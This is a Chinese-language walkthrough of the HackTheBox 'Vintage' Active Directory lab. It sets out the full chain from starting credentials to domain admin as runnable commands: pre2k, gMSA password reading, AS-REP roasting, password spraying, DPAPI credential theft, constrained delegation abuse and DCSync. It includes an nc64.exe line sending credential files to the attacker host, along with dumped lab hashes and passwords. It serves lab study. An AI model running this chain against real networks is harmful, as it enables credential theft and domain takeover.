基本信息

1
As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123

端口扫描

没有web端口,常规域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ nmap -sC -sV -Pn 10.10.11.45
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-02 13:45 CST
Nmap scan report for 10.10.11.45
Host is up (0.074s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-02 05:32:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-12-02T05:32:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -13m49s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds

bloodhound

因为给了初始账号密码,直接添加hosts后先跑bloodhound:

1
2
3
10.10.11.45 vintage.htb dc01.vintage.htb

faketime -f "-13m" bloodhound-python -u P.Rosa -p Rosaisbest123 -d vintage.htb -c All --zip --dns-tcp -ns 10.10.11.45

bloodhound暂时没什么直接路径

users.txt

可以从bloodhound整理,也可以这样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
faketime -f "-13m" nxc smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -d vintage.htb -k --rid-brute 5000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

Administrator
Guest
krbtgt
DC01$
gMSA01$
FS01$
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm

pre2k

这里是在添加主机时勾选了将此计算机帐户指定为Windows 2000 之前的计算机,导致自动使用主机名作为密码:

利用这种方式发现FS01,得到一个ccache:

1
2
3
faketime -f "-13m" pre2k unauth -d vintage.htb -dc-ip 10.10.11.45 -save -inputfile ../users.txt -verbose

[14:24:44] INFO VALID CREDENTIALS: vintage.htb\FS01$:fs01

FS01 to GMSA

之后就使用前面得到的fs01票据进行操作:

1
export KRB5CCNAME=FS01\$.ccache

根据bloodhound,fs01是domain computers,可以读gmsa:

读gmsa得到gmsa01$:

1
2
3
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

54311f0ed05b807a7aaf5943b595f224

GMSA01

之后就为gmsa01申请票据,进行后续操作:

1
2
3
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/'GMSA01$' -hashes :54311f0ed05b807a7aaf5943b595f224

export KRB5CCNAME=GMSA01\$.ccache

gmsa01对SERVICEMANAGERS有GenericWrite:

我们可以对这个组做操作,例如添加用户

然后SERVICEMANAGERS对几个svc账户有GenericAll,我们可以对其修改属性之类,而用户中我们可以看到一个禁用的SVC_SQL,所以我们可以把禁用的用户进行启用:

SERVICEMANAGERS

首先添加用户到SERVICEMANAGERS组中:

1
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"

SVC_XXX

然后使用我们添加的P.Rosa对几个svc账号进行操作

1
2
3
4
5
6
7
8
9
10
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/P.Rosa:Rosaisbest123
export KRB5CCNAME=P.Rosa.ccache

# 设置几个账号不需要preauth,后续进行asrep roast
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH

# 启用SVC_SQL
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE

asrep roast

已经对几个账号添加了不需要preauth,接下来就是asrep rosating:

1
faketime -f "-13m" python3 examples/GetNPUsers.py -request -format hashcat -usersfile users.txt vintage.htb/

得到的hash进行破解,得到svc_sql密码:

1
2
3
sudo hashcat -m 18200 hash.txt ~/Tools/dict/rockyou.txt

Zer0the0ne

C.Neri & user flag

使用破解出的密码进行喷洒,发现C.Neri使用相同密码:

1
2
3
4
faketime -f "-13m" ./kerbrute_darwin_amd64 --dc vintage.htb -d vintage.htb -v passwordspray users.txt Zer0the0ne

2024/12/02 15:04:56 > [+] VALID LOGIN: svc_sql@vintage.htb:Zer0the0ne
2024/12/02 15:04:56 > [+] VALID LOGIN: C.Neri@vintage.htb:Zer0the0ne

之后使用得到的账号密码登录即可,因为只支持kerberos认证,需要修改一下配置文件:

1
2
3
4
5
6
7
8
# 这部分换kali操作了,mac有点问题
sudo ntpdate -s 10.10.11.45

impacket-getTGT vintage.htb/C.Neri:Zer0the0ne
export KRB5CCNAME=C.Neri.ccache

sudo nano /etc/krb5.conf
evil-winrm -i dc01.vintage.htb -r vintage.htb

krb5.conf

1
2
3
4
5
6
7
8
9
10
11
12
[libdefault]
default_realm = VINTAGE.HTB

[realms]
VINTAGE.HTB = {
kdc = dc01.vintage.htb
admin_server = dc01.vintage.htb
}

[domain_realm]
vintage.htb = VINTAGE.HTB
.vintage.htb = VINTAGE.HTB

C.Neri_ADM

然后查看用户可以发现C.Neri还有个adm用户

DPAPI

这里就是模拟现实场景,同一个人日常使用普通账户,需要高权限操作时切换到管理员账户,但为了方便操作保存了凭据,常规dpapi

但机器有杀软,把相关文件下载到本地操作即可:

1
2
3
4
5
*Evil-WinRM* PS C:\Users\C.Neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> Get-ChildItem -Force

cmd /c ".\nc64.exe 10.10.14.18 4444 < C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b"

cmd /c ".\nc64.exe 10.10.14.18 4444 < C:\Users\C.Neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6"

之后就是本地解dpapi:

1
2
3
4
5
6
python3 ~/Tools/impacket/impacket_main/examples/dpapi.py masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne

python3 ~/Tools/impacket/impacket_main/examples/dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

Username : vintage\c.neri_adm
Unknown : Uncr4ck4bl3P4ssW0rd0312

DELEGATEDADMINS

之后使用c.neri_adm进行操作:

1
2
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312
export KRB5CCNAME=c.neri_adm.ccache

可以看到对DELEGATEDADMINS组有GenericWrite权限,我们可以向其中添加用户:

那我们如果添加一个设置了spn的svc用户,就可以委派模拟其他用户,另外可以看到L.BIANCHI_ADM有dcsync权限,可以作为我们的目标用户:

add svc to DELEGATEDADMINS

1
2
3
4
5
6
7
# 使用前面的servicemanagers票据
export KRB5CCNAME=P.Rosa.ccache
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k set object 'SVC_SQL' servicePrincipalName -v "cifs/x"

# 使用c.neri_adm
export KRB5CCNAME=c.neri_adm.ccache
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "DELEGATEDADMINS" "SVC_SQL"

impersonate & dcsync

然后就使用svc_sql模拟L.BIANCHI_ADM:

1
2
3
4
5
6
7
8
9
10
11
12
# sql_svc如果已经被自动禁用了,重新启用一下
# 一系列操作快速完成
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/svc_sql:Zer0the0ne
export KRB5CCNAME=svc_sql.ccache

faketime -f "-13m" python3 examples/getST.py -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'
export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache

# dcsync
faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -just-dc-user Administrator -k -no-pass

468c7497513f8243b59980f2240a10de

root flag

Administrator实际上不能登录,还是使用L.BIANCHI_ADM:

1
2
export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
faketime -f "-13m" python3 examples/wmiexec.py L.BIANCHI_ADM@dc01.vintage.htb -k -no-pass

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -k -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:b0e2eccf559f2be2120e9bce41a51e2c:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7aaf5943b595f224:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::

参考资料